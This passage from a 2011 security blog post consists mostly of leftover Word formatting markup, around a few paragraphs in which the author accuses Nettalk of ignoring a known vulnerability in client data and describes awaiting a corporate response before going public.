UnhideWhenUsed="false" Name="Medium List 1 Accent 6" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 6" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 6" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 6" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 6" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 6" /> <w:LsdException Locked="false" Priority="19" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis" /> <w:LsdException Locked="false" Priority="21" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis" /> <w:LsdException Locked="false" Priority="31" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference" /> <w:LsdException Locked="false" Priority="32" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Reference" /> <w:LsdException Locked="false" Priority="33" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Book Title" /> <w:LsdException Locked="false" Priority="37" Name="Bibliography" /> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading" /> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]><br />
<style>
 /* Style Definitions */
 table.MsoNormalTable
	{mso-style-name:"Table Normal";
	mso-tstyle-rowband-size:0;
	mso-tstyle-colband-size:0;
	mso-style-noshow:yes;
	mso-style-priority:99;
	mso-style-parent:"";
	mso-padding-alt:0in 5.4pt 0in 5.4pt;
	mso-para-margin-top:0in;
	mso-para-margin-right:0in;
	mso-para-margin-bottom:10.0pt;
	mso-para-margin-left:0in;
	line-height:115%;
	mso-pagination:widow-orphan;
	font-size:11.0pt;
	font-family:"Calibri","sans-serif";
	mso-ascii-font-family:Calibri;
	mso-ascii-theme-font:minor-latin;
	mso-hansi-font-family:Calibri;
	mso-hansi-theme-font:minor-latin;}
</style>
<p> <![endif]--></p>
<p class="MsoNormal">I like for you all to reread the first line, second sentence. Yes you read it right Nettalk knew its client’s data was vulnerable and chose to ignore the vulnerability hoping no one else would find it.</p>
<p class="MsoNormal">I responded to these acquisitions with the following message:</p>
<p class="MsoNormal"><a href="http://www.digitaloffensive.com/wp-content/uploads/2011/06/nettalk4.png"><img class="aligncenter size-medium wp-image-345" title="nettalk4" src="http://www.digitaloffensive.com/wp-content/uploads/2011/06/nettalk4-215x300.png" alt="" width="215" height="300" /><!--[if gte mso 9]><xml> <o:OfficeDocumentSettings> <o:RelyOnVML /> <o:AllowPNG /> </o:OfficeDocumentSettings> </xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves /> <w:TrackFormatting /> <w:PunctuationKerning /> <w:ValidateAgainstSchemas /> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF /> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables /> <w:SnapToGridInCell /> <w:WrapTextWithPunct /> <w:UseAsianBreakRules /> <w:DontGrowAutofit /> <w:SplitPgBreakAndParaMark /> <w:EnableOpenTypeKerning /> <w:DontFlipMirrorIndents /> <w:OverrideTableStyleHps /> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math" /> <m:brkBin m:val="before" /> <m:brkBinSub m:val="&#45;-" /> <m:smallFrac m:val="off" /> <m:dispDef /> <m:lMargin m:val="0" /> <m:rMargin m:val="0" /> <m:defJc m:val="centerGroup" /> <m:wrapIndent m:val="1440" /> <m:intLim m:val="subSup" /> <m:naryLim m:val="undOvr" /> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"   DefSemiHidden="true" DefQFormat="false" DefPriority="99"   LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Normal" /> <w:LsdException Locked="false" Priority="9" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="heading 1" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9" /> <w:LsdException Locked="false" Priority="39" Name="toc 1" /> <w:LsdException Locked="false" Priority="39" Name="toc 2" /> <w:LsdException Locked="false" Priority="39" Name="toc 3" /> <w:LsdException Locked="false" Priority="39" Name="toc 4" /> <w:LsdException Locked="false" Priority="39" Name="toc 5" /> <w:LsdException Locked="false" Priority="39" Name="toc 6" /> <w:LsdException Locked="false" Priority="39" Name="toc 7" /> <w:LsdException Locked="false" Priority="39" Name="toc 8" /> <w:LsdException Locked="false" Priority="39" Name="toc 9" /> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption" /> <w:LsdException Locked="false" Priority="10" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Title" /> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font" /> <w:LsdException Locked="false" Priority="11" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtitle" /> <w:LsdException Locked="false" Priority="22" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Strong" /> <w:LsdException Locked="false" Priority="20" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Emphasis" /> <w:LsdException Locked="false" Priority="59" SemiHidden="false"    UnhideWhenUsed="false" Name="Table Grid" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text" /> <w:LsdException Locked="false" Priority="1" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="No Spacing" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 1" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 1" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 1" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 1" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision" /> <w:LsdException Locked="false" Priority="34" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="List Paragraph" /> <w:LsdException Locked="false" Priority="29" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Quote" /> <w:LsdException Locked="false" Priority="30" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Quote" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 1" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 1" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 1" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 1" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 1" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 2" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 2" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 2" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 2" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 2" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 2" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 2" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 2" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 3" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 3" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 3" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 3" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 3" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 3" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 3" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 3" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 3" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 4" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 4" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 4" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 4" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 4" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 4" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 4" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 4" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 4" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 5" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 5" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 5" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 5" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 5" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 5" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 5" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 5" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 5" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 6" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 6" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 6" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 6" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 6" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 6" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 6" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 6" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 6" /> <w:LsdException Locked="false" Priority="19" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis" /> <w:LsdException Locked="false" Priority="21" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis" /> <w:LsdException Locked="false" Priority="31" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference" /> <w:LsdException Locked="false" Priority="32" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Reference" /> <w:LsdException Locked="false" Priority="33" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Book Title" /> <w:LsdException Locked="false" Priority="37" Name="Bibliography" /> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading" /> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]><br />
<style>
 /* Style Definitions */
 table.MsoNormalTable
	{mso-style-name:"Table Normal";
	mso-tstyle-rowband-size:0;
	mso-tstyle-colband-size:0;
	mso-style-noshow:yes;
	mso-style-priority:99;
	mso-style-parent:"";
	mso-padding-alt:0in 5.4pt 0in 5.4pt;
	mso-para-margin-top:0in;
	mso-para-margin-right:0in;
	mso-para-margin-bottom:10.0pt;
	mso-para-margin-left:0in;
	line-height:115%;
	mso-pagination:widow-orphan;
	font-size:11.0pt;
	font-family:"Calibri","sans-serif";
	mso-ascii-font-family:Calibri;
	mso-ascii-theme-font:minor-latin;
	mso-hansi-font-family:Calibri;
	mso-hansi-theme-font:minor-latin;}
</style>
<p> <![endif]--> </a></p>
<p class="MsoNormal">This all took place around 8:30 am EST on 6/24/2011. It is now 5:00 PM EST on 6/24/2011 and I have not received and apology from him. I have contacted Nettalk customer service and I am awaiting a response from corporate to provide them this information. If they do not respond by close of business today I feel that is my duty to inform its clients about their blatant neglect for their client’s privacy and safety.</p>
<p class="MsoNormal"><!--[if gte mso 9]><xml> <o:OfficeDocumentSettings> <o:RelyOnVML /> <o:AllowPNG /> </o:OfficeDocumentSettings> </xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves /> <w:TrackFormatting /> <w:PunctuationKerning /> <w:ValidateAgainstSchemas /> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF /> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables /> <w:SnapToGridInCell /> <w:WrapTextWithPunct /> <w:UseAsianBreakRules /> <w:DontGrowAutofit /> <w:SplitPgBreakAndParaMark /> <w:EnableOpenTypeKerning /> <w:DontFlipMirrorIndents /> <w:OverrideTableStyleHps /> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math" /> <m:brkBin m:val="before" /> <m:brkBinSub m:val="&#45;-" /> <m:smallFrac m:val="off" /> <m:dispDef /> <m:lMargin m:val="0" /> <m:rMargin m:val="0" /> <m:defJc m:val="centerGroup" /> <m:wrapIndent m:val="1440" /> <m:intLim m:val="subSup" /> <m:naryLim m:val="undOvr" /> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"   DefSemiHidden="true" DefQFormat="false" DefPriority="99"   LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Normal" /> <w:LsdException Locked="false" Priority="9" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="heading 1" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9" /> <w:LsdException Locked="false" Priority="39" Name="toc 1" /> <w:LsdException Locked="false" Priority="39" Name="toc 2" /> <w:LsdException Locked="false" Priority="39" Name="toc 3" /> <w:LsdException Locked="false" Priority="39" Name="toc 4" /> <w:LsdException Locked="false" Priority="39" Name="toc 5" /> <w:LsdException Locked="false" Priority="39" Name="toc 6" /> <w:LsdException Locked="false" Priority="39" Name="toc 7" /> <w:LsdException Locked="false" Priority="39" Name="toc 8" /> <w:LsdException Locked="false" Priority="39" Name="toc 9" /> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption" /> <w:LsdException Locked="false" Priority="10" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Title" /> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font" /> <w:LsdException Locked="false" Priority="11" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtitle" /> <w:LsdException Locked="false" Priority="22" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Strong" /> <w:LsdException Locked="false" Priority="20" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Emphasis" /> <w:LsdException Locked="false" Priority="59" SemiHidden="false"    UnhideWhenUsed="false" Name="Table Grid" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text" /> <w:LsdException Locked="false" Priority="1" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="No Spacing" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 1" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 1" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 1" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 1" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision" /> <w:LsdException Locked="false" Priority="34" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="List Paragraph" /> <w:LsdException Locked="false" Priority="29" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Quote" /> <w:LsdException Locked="false" Priority="30" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Quote" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 1" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 1" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 1" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 1" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 1" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 2" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 2" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 2" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 2" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 2" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 2" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 2" /> 